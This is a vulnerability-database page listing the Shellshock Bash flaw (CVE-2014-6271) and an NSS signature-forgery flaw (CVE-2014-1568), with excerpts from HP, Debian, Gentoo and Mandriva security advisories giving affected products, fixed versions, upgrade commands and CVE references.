VARIoT IoT vulnerabilities database
| VAR-201409-1156 | CVE-2014-6271 |
GNU Bash shell executes commands in exported functions in environment variables
Related entries in the VARIoT exploits database: VAR-E-201409-0013, VAR-E-201409-0022, VAR-E-201409-0010, VAR-E-201409-0017, VAR-E-201409-0018, VAR-E-201409-0020, VAR-E-201409-0021, VAR-E-201410-0028, VAR-E-201410-0031, VAR-E-201410-0026, VAR-E-201410-0021, VAR-E-201410-0023, VAR-E-201409-0019, VAR-E-201410-0030, VAR-E-201410-0027, VAR-E-201410-0024, VAR-E-201410-0022, VAR-E-201409-0011, VAR-E-201409-0015, VAR-E-201410-0029, VAR-E-201409-0561, VAR-E-201409-0560, VAR-E-201409-0562, VAR-E-201409-0565, VAR-E-201409-0544, VAR-E-201409-0543, VAR-E-201409-0548, VAR-E-201409-0563, VAR-E-201409-0566, VAR-E-201409-0564, VAR-E-201409-0559, VAR-E-201409-0555, VAR-E-201409-0546, VAR-E-201409-0549, VAR-E-201409-0545, VAR-E-201409-0553, VAR-E-201409-0550, VAR-E-201409-0552, VAR-E-201409-0558, VAR-E-201409-0547 |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix. GNU Bash 4.3 and earlier contains a command injection vulnerability that may allow remote code execution.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
This vulnerability allows users that have been granted access to a shell
script to escalate privilege and execute unrestricted commands at the same
security level as the Bash script.
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04477872
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04477872
Version: 1
HPSBST03131 rev.1 - HP StoreOnce Backup Systems running Bash Shell, Remote Code Execution
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2014-10-16
Last Updated: 2014-10-16
Potential Security Impact: Remote unauthorized access
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential security vulnerability has been identified with certain HP
StoreOnce Backup systems running Bash Shell.
NOTE: Versions of HP StoreOnce Backup software prior to 3.11.4 contain the
vulnerable version of Bash. However, HP is unaware of any method that would
allow this vulnerability to be exploited on HP StoreOnce Backup systems but
is providing an updated version of Bash Shell as a precaution.
References:
CVE-2014-7169
CVE-2014-6271
CVE-2014-7187
CVE-2014-7186
SSRT101749
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP StoreOnce Backup software versions 3.0.0 to 3.11.3.
Please refer to the RESOLUTION section below for a list of impacted products.
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-7186 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2014-7187 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following updates available to resolve the vulnerability in
HP StoreOnce Backup systems running Bash Shell.
HP StoreOnce Backup version 3.11.4 for the following products:
Product SKU
Product Name
BB896A
HP StoreOnce 6500 Backup
EJ022A
HP StoreOnce B6200 Backup
BB903A
HP StoreOnce 4900 Backup
BB877A
HP StoreOnce 2700 Backup
BB878A
HP StoreOnce 4500 Backup
BB879A
HP StoreOnce 4700 Backup
HP StoreOnce 2610 iSCSI Backup system
BB852A
HP StoreOnce 2620 iSCSI Backup system
BB853A
HP StoreOnce 4210 iSCSI Backup system
BB854A
HP StoreOnce 4210 FC Backup system
BB855A
HP StoreOnce 4220 Backup system
BB856A
HP StoreOnce 4420 Backup system
BB857A
HP StoreOnce 4430 Backup system
TC458A/AAE
HP StoreOnce VSA 10 TB 3 Year Software
D4T77A/AAE
HP StoreOnce VSA 4 TB 3 Year Software
HISTORY
Version:1 (rev.1) - 16 October 2014 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP nor
its affiliates, subcontractors or suppliers will be liable for
incidental, special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
| VAR-201409-0340 | CVE-2014-1568 | Mozilla Network Security Services (NSS) fails to properly verify RSA signatures |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Mozilla Network Security Services (NSS) before 3.16.2.1, 3.16.x before 3.16.5, and 3.17.x before 3.17.1, as used in Mozilla Firefox before 32.0.3, Mozilla Firefox ESR 24.x before 24.8.1 and 31.x before 31.1.1, Mozilla Thunderbird before 24.8.1 and 31.x before 31.1.2, Mozilla SeaMonkey before 2.29.1, Google Chrome before 37.0.2062.124 on Windows and OS X, and Google Chrome OS before 37.0.2062.120, does not properly parse ASN.1 values in X.509 certificates, which makes it easier for remote attackers to spoof RSA signatures via a crafted certificate, aka a "signature malleability" issue. The Mozilla Network Security Services (NSS) library fails to properly verify RSA signatures due to incorrect ASN.1 parsing of DigestInfo. This vulnerability may allow an attacker to forge an RSA signature, such as the one on an SSL certificate. The vulnerability is caused by the program not correctly parsing ASN.1 values in X.509 certificates.
For the stable distribution (wheezy), this problem has been fixed in
version 2:3.14.5-1+deb7u2.
For the testing distribution (jessie), this problem has been fixed in
version 2:3.17.1.
For the unstable distribution (sid), this problem has been fixed in
version 2:3.17.1.
We recommend that you upgrade your nss packages.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201504-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Mozilla Products: Multiple vulnerabilities
Date: April 07, 2015
Bugs: #489796, #491234, #493850, #500320, #505072, #509050,
#512896, #517876, #522020, #523652, #525474, #531408,
#536564, #541316, #544056
ID: 201504-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in Mozilla Firefox,
Thunderbird, and SeaMonkey, the worst of which may allow user-assisted
execution of arbitrary code.
Background
==========
Mozilla Firefox is an open-source web browser and Mozilla Thunderbird
an open-source email client, both from the Mozilla Project. The
SeaMonkey project is a community effort to deliver production-quality
releases of code derived from the application formerly known as the
'Mozilla Application Suite'.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-client/firefox < 31.5.3 >= 31.5.3
2 www-client/firefox-bin < 31.5.3 >= 31.5.3
3 mail-client/thunderbird < 31.5.0 >= 31.5.0
4 mail-client/thunderbird-bin < 31.5.0 >= 31.5.0
5 www-client/seamonkey < 2.33.1 >= 2.33.1
6 www-client/seamonkey-bin < 2.33.1 >= 2.33.1
7 dev-libs/nspr < 4.10.6 >= 4.10.6
-------------------------------------------------------------------
7 affected packages
Description
===========
Multiple vulnerabilities have been discovered in Firefox, Thunderbird,
and SeaMonkey. Please review the CVE identifiers referenced below for
details.
Impact
======
A remote attacker could entice a user to view a specially crafted web
page or email, possibly resulting in execution of arbitrary code or a
Denial of Service condition. Furthermore, a remote attacker may be able
to perform Man-in-the-Middle attacks, obtain sensitive information,
spoof the address bar, conduct clickjacking attacks, bypass security
restrictions and protection mechanisms, or have other unspecified
impact.
Workaround
==========
There are no known workarounds at this time.
Resolution
==========
All firefox users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-client/firefox-31.5.3"
All firefox-bin users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-client/firefox-bin-31.5.3"
All thunderbird users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=mail-client/thunderbird-31.5.0"
All thunderbird-bin users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=mail-client/thunderbird-bin-31.5.0"
All seamonkey users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-client/seamonkey-2.33.1"
All seamonkey-bin users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-client/seamonkey-bin-2.33.1"
All nspr users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-libs/nspr-4.10.6"
References
==========
[ 1 ] CVE-2013-1741
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1741
[ 2 ] CVE-2013-2566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2566
[ 3 ] CVE-2013-5590
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5590
[ 4 ] CVE-2013-5591
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5591
[ 5 ] CVE-2013-5592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5592
[ 6 ] CVE-2013-5593
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5593
[ 7 ] CVE-2013-5595
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5595
[ 8 ] CVE-2013-5596
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5596
[ 9 ] CVE-2013-5597
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5597
[ 10 ] CVE-2013-5598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5598
[ 11 ] CVE-2013-5599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5599
[ 12 ] CVE-2013-5600
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5600
[ 13 ] CVE-2013-5601
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5601
[ 14 ] CVE-2013-5602
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5602
[ 15 ] CVE-2013-5603
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5603
[ 16 ] CVE-2013-5604
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5604
[ 17 ] CVE-2013-5605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5605
[ 18 ] CVE-2013-5606
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5606
[ 19 ] CVE-2013-5607
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5607
[ 20 ] CVE-2013-5609
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5609
[ 21 ] CVE-2013-5610
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5610
[ 22 ] CVE-2013-5612
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5612
[ 23 ] CVE-2013-5613
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5613
[ 24 ] CVE-2013-5614
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5614
[ 25 ] CVE-2013-5615
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5615
[ 26 ] CVE-2013-5616
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5616
[ 27 ] CVE-2013-5618
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5618
[ 28 ] CVE-2013-5619
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5619
[ 29 ] CVE-2013-6671
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6671
[ 30 ] CVE-2013-6672
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6672
[ 31 ] CVE-2013-6673
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6673
[ 32 ] CVE-2014-1477
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1477
[ 33 ] CVE-2014-1478
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1478
[ 34 ] CVE-2014-1479
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1479
[ 35 ] CVE-2014-1480
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1480
[ 36 ] CVE-2014-1481
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1481
[ 37 ] CVE-2014-1482
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1482
[ 38 ] CVE-2014-1483
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1483
[ 39 ] CVE-2014-1485
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1485
[ 40 ] CVE-2014-1486
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1486
[ 41 ] CVE-2014-1487
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1487
[ 42 ] CVE-2014-1488
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1488
[ 43 ] CVE-2014-1489
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1489
[ 44 ] CVE-2014-1490
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1490
[ 45 ] CVE-2014-1491
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1491
[ 46 ] CVE-2014-1492
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1492
[ 47 ] CVE-2014-1493
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1493
[ 48 ] CVE-2014-1494
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1494
[ 49 ] CVE-2014-1496
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1496
[ 50 ] CVE-2014-1497
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1497
[ 51 ] CVE-2014-1498
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1498
[ 52 ] CVE-2014-1499
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1499
[ 53 ] CVE-2014-1500
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1500
[ 54 ] CVE-2014-1502
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1502
[ 55 ] CVE-2014-1505
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1505
[ 56 ] CVE-2014-1508
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1508
[ 57 ] CVE-2014-1509
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1509
[ 58 ] CVE-2014-1510
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1510
[ 59 ] CVE-2014-1511
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1511
[ 60 ] CVE-2014-1512
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1512
[ 61 ] CVE-2014-1513
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1513
[ 62 ] CVE-2014-1514
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1514
[ 63 ] CVE-2014-1518
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1518
[ 64 ] CVE-2014-1519
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1519
[ 65 ] CVE-2014-1520
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1520
[ 66 ] CVE-2014-1522
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1522
[ 67 ] CVE-2014-1523
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1523
[ 68 ] CVE-2014-1524
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1524
[ 69 ] CVE-2014-1525
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1525
[ 70 ] CVE-2014-1526
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1526
[ 71 ] CVE-2014-1529
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1529
[ 72 ] CVE-2014-1530
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1530
[ 73 ] CVE-2014-1531
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1531
[ 74 ] CVE-2014-1532
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1532
[ 75 ] CVE-2014-1533
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1533
[ 76 ] CVE-2014-1534
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1534
[ 77 ] CVE-2014-1536
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1536
[ 78 ] CVE-2014-1537
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1537
[ 79 ] CVE-2014-1538
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1538
[ 80 ] CVE-2014-1539
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1539
[ 81 ] CVE-2014-1540
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1540
[ 82 ] CVE-2014-1541
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1541
[ 83 ] CVE-2014-1542
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1542
[ 84 ] CVE-2014-1543
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1543
[ 85 ] CVE-2014-1544
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1544
[ 86 ] CVE-2014-1545
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1545
[ 87 ] CVE-2014-1547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1547
[ 88 ] CVE-2014-1548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1548
[ 89 ] CVE-2014-1549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1549
[ 90 ] CVE-2014-1550
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1550
[ 91 ] CVE-2014-1551
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1551
[ 92 ] CVE-2014-1552
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1552
[ 93 ] CVE-2014-1553
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1553
[ 94 ] CVE-2014-1554
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1554
[ 95 ] CVE-2014-1555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1555
[ 96 ] CVE-2014-1556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1556
[ 97 ] CVE-2014-1557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1557
[ 98 ] CVE-2014-1558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1558
[ 99 ] CVE-2014-1559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1559
[ 100 ] CVE-2014-1560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1560
[ 101 ] CVE-2014-1561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1561
[ 102 ] CVE-2014-1562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1562
[ 103 ] CVE-2014-1563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1563
[ 104 ] CVE-2014-1564
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1564
[ 105 ] CVE-2014-1565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1565
[ 106 ] CVE-2014-1566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1566
[ 107 ] CVE-2014-1567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1567
[ 108 ] CVE-2014-1568
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1568
[ 109 ] CVE-2014-1574
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1574
[ 110 ] CVE-2014-1575
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1575
[ 111 ] CVE-2014-1576
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1576
[ 112 ] CVE-2014-1577
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1577
[ 113 ] CVE-2014-1578
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1578
[ 114 ] CVE-2014-1580
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1580
[ 115 ] CVE-2014-1581
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1581
[ 116 ] CVE-2014-1582
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1582
[ 117 ] CVE-2014-1583
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1583
[ 118 ] CVE-2014-1584
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1584
[ 119 ] CVE-2014-1585
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1585
[ 120 ] CVE-2014-1586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1586
[ 121 ] CVE-2014-1587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1587
[ 122 ] CVE-2014-1588
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1588
[ 123 ] CVE-2014-1589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1589
[ 124 ] CVE-2014-1590
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1590
[ 125 ] CVE-2014-1591
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1591
[ 126 ] CVE-2014-1592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1592
[ 127 ] CVE-2014-1593
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1593
[ 128 ] CVE-2014-1594
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1594
[ 129 ] CVE-2014-5369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-5369
[ 130 ] CVE-2014-8631
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8631
[ 131 ] CVE-2014-8632
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8632
[ 132 ] CVE-2014-8634
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8634
[ 133 ] CVE-2014-8635
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8635
[ 134 ] CVE-2014-8636
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8636
[ 135 ] CVE-2014-8637
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8637
[ 136 ] CVE-2014-8638
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8638
[ 137 ] CVE-2014-8639
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8639
[ 138 ] CVE-2014-8640
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8640
[ 139 ] CVE-2014-8641
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8641
[ 140 ] CVE-2014-8642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8642
[ 141 ] CVE-2015-0817
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0817
[ 142 ] CVE-2015-0818
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0818
[ 143 ] CVE-2015-0819
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0819
[ 144 ] CVE-2015-0820
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0820
[ 145 ] CVE-2015-0821
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0821
[ 146 ] CVE-2015-0822
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0822
[ 147 ] CVE-2015-0823
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0823
[ 148 ] CVE-2015-0824
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0824
[ 149 ] CVE-2015-0825
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0825
[ 150 ] CVE-2015-0826
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0826
[ 151 ] CVE-2015-0827
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0827
[ 152 ] CVE-2015-0828
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0828
[ 153 ] CVE-2015-0829
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0829
[ 154 ] CVE-2015-0830
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0830
[ 155 ] CVE-2015-0831
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0831
[ 156 ] CVE-2015-0832
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0832
[ 157 ] CVE-2015-0833
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0833
[ 158 ] CVE-2015-0834
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0834
[ 159 ] CVE-2015-0835
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0835
[ 160 ] CVE-2015-0836
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0836
[ 161 ] CVE-2014-1504
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1504
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201504-01
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2015 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2015:059
http://www.mandriva.com/en/support/security/
_______________________________________________________________________
Package : nss
Date : March 13, 2015
Affected: Business Server 2.0
_______________________________________________________________________
Problem Description:
Multiple vulnerabilities have been found and corrected in the Mozilla
NSS and NSPR packages:
The cert_TestHostName function in lib/certdb/certdb.c in the
certificate-checking implementation in Mozilla Network Security
Services (NSS) before 3.16 accepts a wildcard character that is
embedded in an internationalized domain name's U-label, which might
allow man-in-the-middle attackers to spoof SSL servers via a crafted
certificate (CVE-2014-1492).
Use-after-free vulnerability in the CERT_DestroyCertificate function
in libnss3.so in Mozilla Network Security Services (NSS) 3.x, as used
in Firefox before 31.0, Firefox ESR 24.x before 24.7, and Thunderbird
before 24.7, allows remote attackers to execute arbitrary code via
vectors that trigger certain improper removal of an NSSCertificate
structure from a trust domain (CVE-2014-1544).
The definite_length_decoder function in lib/util/quickder.c in
Mozilla Network Security Services (NSS) before 3.16.2.4 and 3.17.x
before 3.17.3 does not ensure that the DER encoding of an ASN.1
length is properly formed, which allows remote attackers to conduct
data-smuggling attacks by using a long byte sequence for an encoding,
as demonstrated by the SEC_QuickDERDecodeItem function's improper
handling of an arbitrary-length encoding of 0x00 (CVE-2014-1569).
Mozilla Netscape Portable Runtime (NSPR) before 4.10.6 allows remote
attackers to execute arbitrary code or cause a denial of service
(out-of-bounds write) via vectors involving the sprintf and console
functions (CVE-2014-1545).
The sqlite3 packages have been upgraded to the 3.8.6 version as a
prerequisite for nss-3.17.x.
Additionally the rootcerts package has also been updated to the
latest version as of 2014-11-17, which adds, removes, and distrusts
several certificates.
The updated packages provide a solution for these security issues.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1492
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1544
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1568
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1569
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1545
https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.16_release_notes
https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.16.1_release_notes
https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.16.2_release_notes
https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.16.3_release_notes
https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.17_release_notes
https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.17.1_release_notes
https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.17.2_release_notes
https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.17.3_release_notes
